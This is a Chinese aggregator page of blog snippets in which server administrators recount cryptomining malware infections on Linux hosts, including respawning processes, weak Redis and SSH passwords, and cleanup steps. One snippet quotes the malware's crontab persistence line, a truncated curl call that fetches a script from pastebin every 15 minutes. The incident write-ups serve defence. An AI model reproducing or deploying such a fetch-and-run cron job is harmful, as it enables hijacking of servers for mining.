原文:linux 服务器发现了挖矿病毒

.发现病毒 近日,因为自己搭建的个人网站做了一版更新,准备去服务器做部署。连接服务器的时候明显感觉到消耗的时间比以往要久,半天才响应过来。 在测试网络没有问题之后,随即使用top命令看下进程情况,结果如下图所示 整齐划一的进程,且自己没有做过这样的部署。发现不对劲,于是马上使用kill命令干掉这些进程。神奇的事情发生了,这些进程就像不倒翁一样,几个kill命令过去它们又重新站了起来。 .解决问题 ...

2019-10-06 18:13 0 2317 推荐指数:

查看详情

Linux 服务器上有挖矿病毒处理【分析+解决】

Linux 服务器上有挖矿病毒处理 分析 今天遇到病毒挖矿,有点小兴奋。 来波分析: 看上面的症状是:攻击者通过docker入侵的【后面了解,可能是redis账号密码简单的原因被爆破的】 最奇诡的事,攻击者可能通过提权,获取到root的权限。然后一些列的挖矿病毒 大致流程图 ...

Thu Apr 02 00:13:00 CST 2020 0 3599
服务器中了挖矿病毒

这几天阿里云云服务器cpu一直跑满,一查发现有个定时任务,在搜索一下,发现自己中毒了,原来前几天搞redis学习的时候设置了个弱密码,被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...

Sat Apr 13 20:26:00 CST 2019 0 1536
挖矿木马】服务器挖矿病毒入侵的清理思路

一般情况下,挖矿病毒都是自动扫描+自动挂马生成的,并不会是有专人进行攻击,所以也比较好清除,注意清除之后需要 check 有无后门。 最重要几点(也可能是被hack的原因):禁止 ROOT 用户登陆,ROOT 不能使用弱密码,FRP 需要配置,不能使用默认选项。 挖矿进程占用的 CPU 资源 ...

Wed Jan 06 19:27:00 CST 2021 0 515
记一次Linux服务器因redis漏洞的挖矿病毒入侵

中毒原因,redis bind 0.0.0.0 而且没有密码,和安全意识太薄弱。 所以,redis一定要设密码,改端口,不要用root用户启动,如果业务没有需要,不要bind 0.0.0.0!!!!!!!!!!! 这个病毒能都横向传播,不要以为在外网redis的端口不通就没有事情。只要内网 ...

Sun Apr 14 01:28:00 CST 2019 0 1889
linux 服务器被植入ddgs、qW3xT.2挖矿病毒处理记录

被入侵后的现象: 发现有qW3xT.2与ddgs两个异常进程,消耗了较高的cpu,kill掉后 过一会就会重新出现。 kill 掉这两个异常进程后,过一段时间看到了如下进程: 首先在/etc/sysconfig/crotnab中的定时任务没有找到定时脚本,输入crontab -e ...

Thu Sep 13 02:15:00 CST 2018 4 1704
排查 Linux系统下SSH被暴力破解 植入pnscan 挖矿病毒入侵服务器

发现病毒入侵历程: 昨天正常网上遨游在技术天地中,忽然发现网络变得异常卡顿,解析网站变得很慢 甚至打不开,我的第一反应就是DNS可能出了问题,然后ping 域名同时追踪外网地址 ,并同时ping包结果都没有问题。然后就启动测速软件,测速结果3M不到,我的网络环境是电信200M+联通300M ...

Wed Dec 01 01:28:00 CST 2021 0 1448
阿里云服务器centos7挖矿病毒处理

处理过程: 1、查找异常进程,确定病毒进程,定位病毒脚本的执行用户 2、杀掉病毒进程,注意要检查清楚,病毒进程可能有多个,同时也要注意不要误删系统进程或者阿里云的进程 3、检查定时任务,一般都会有,以达到病毒自启的效果,通过定时任务内容定位病毒脚本的位置,然后删除病毒脚本 4、整改 ...

Thu Mar 26 17:08:00 CST 2020 0 1306
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM